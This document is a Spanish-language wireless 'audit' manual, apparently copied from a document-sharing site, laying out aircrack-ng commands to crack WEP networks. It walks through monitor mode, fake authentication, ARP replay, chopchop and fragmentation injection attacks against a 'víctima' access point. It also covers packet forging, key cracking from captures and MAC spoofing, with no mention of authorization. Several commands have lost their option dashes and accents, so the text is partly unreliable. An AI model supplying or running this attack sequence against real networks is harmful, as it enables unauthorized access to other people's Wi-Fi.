Professional Documents
Culture Documents
Pasos a seguir:
Iniciar la carga del Live CD, eligiendo la opciones de america-lima, spanish, startX
Actualizar la versin del aircrack, iniciando un terminal de consola desde la carpeta de aircrack
y ejecutando los siguientes comandos:
#make clean
#make
#make install
Posterior al paso anterior, se sugiere crear una carpeta especfica de trabajo (ejemplo: redes),
desde la cual debe abrir el terminal de consola y ejecutar los siguientes comandos:
#iwconfig
Permite apreciar el tipo de chipset de nuestra tarjeta de red inalmbrica (la sigla de la antena
que se debe utilizar para poder ponerse en modo monitor).
#airodump-ng wlan0
Permite ver los AP (Acess Point) disponibles en el entorno o capacidad del espectro de
radiacin, esto es conocido como sniffer
#aircrack-ng captura-01.cap
Permite descifrar los ARP capturados a la hora de hacer el proceso anterior
captura-01.cap es el archivo creado a la hora del escaneo por MAC
CASO2:
Manual de Auditora de Redes Inalmbricas (Wireless)
con Live CD de WifiWay v.2.0.1
Tipo de tarjeta
#iwconfig
Aqu nos dir, si nuestra tarjeta es reconocida por el sistema o no lo es. Bien sabiendo ya la
interface de nuestra tarjeta que puede ser, wlan0, wlan1, ath0, etc, etc, dependiendo del chipset
claro est. En este caso es wlan0, (puesto que es Realtek)
Modo monitor
#iwconfig wlan0 mode monitor
#airmon-ng start wlan0
Asociacin
#aireplay-ng -1 30 -o 1 -e (nombre bssid) -a aa:bb:cc:dd:ee:ff -h (Mac de nuestra tarjeta) wlan0
#aireplay-ng -1 30 -o 1 -e PERICO -a aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 wlan0
#aireplay-ng -1 30 -o 1 -e PERICO DE LOS PALOTES -a aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55
wlan0
Ataque 3
#aireplay-ng -3 -b Mac vctima -h aa:bb:cc:dd:ee:ff interface
#aireplay-ng -3 -b aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 wlan0
Ataque 2
#aireplay-ng -2 p 0841 c ff:ff:ff:ff:ff:ff b (bssid del Ap) h (nuestra bssid o la del cliente) wlan0
#aireplay-ng -2 p 0841 c ff:ff:ff:ff:ff:ff b aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 wlan0
Ataque 4
#aireplay-ng -4 -b Mac vctima -h aa:bb:cc:dd:ee:ff interface
#aireplay-ng -4 -b aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 wlan0
#tcpdump -s 0 -n -e -r [archivo.cap]
#packetforge-ng -0 -a 00:02:CF:XX:XX:XX -h 00:11:22:33:44:55 -k 192.168.1.255 -l 192.168.1.1 -y
[archivo.xor] -w arp
Primero se pone el Segundo ip y luego el primer ip
#aireplay-ng -2 -x 1024 -h 00:11:22:33:44:55 -r arp ath0
Nosotros le aadimos la opcin -x 1024, para que inyecte 1024 paquetes por segundo, por defecto
son 600 (creo). Algunos AP se saturan al inyectar a 1024, o pude que incluso se bloqueen con la
opcin por defecto, (600), si vemos que al lanzar el A2 empieza a inyectar, y se para a los pocos
segundos, relanzaremos el A2 aadiendo la opcin -x 300.
Desemcriptacion
#aircrack-ptw (nombre archivo)-01.cap
#aircrack-ptw lan-01.cap
#aircrack-ng lan-01.cap
#aircrack lan-01.cap
Cambio de MAC
#macchanger -m 00:11:22:33:44:55 wlan0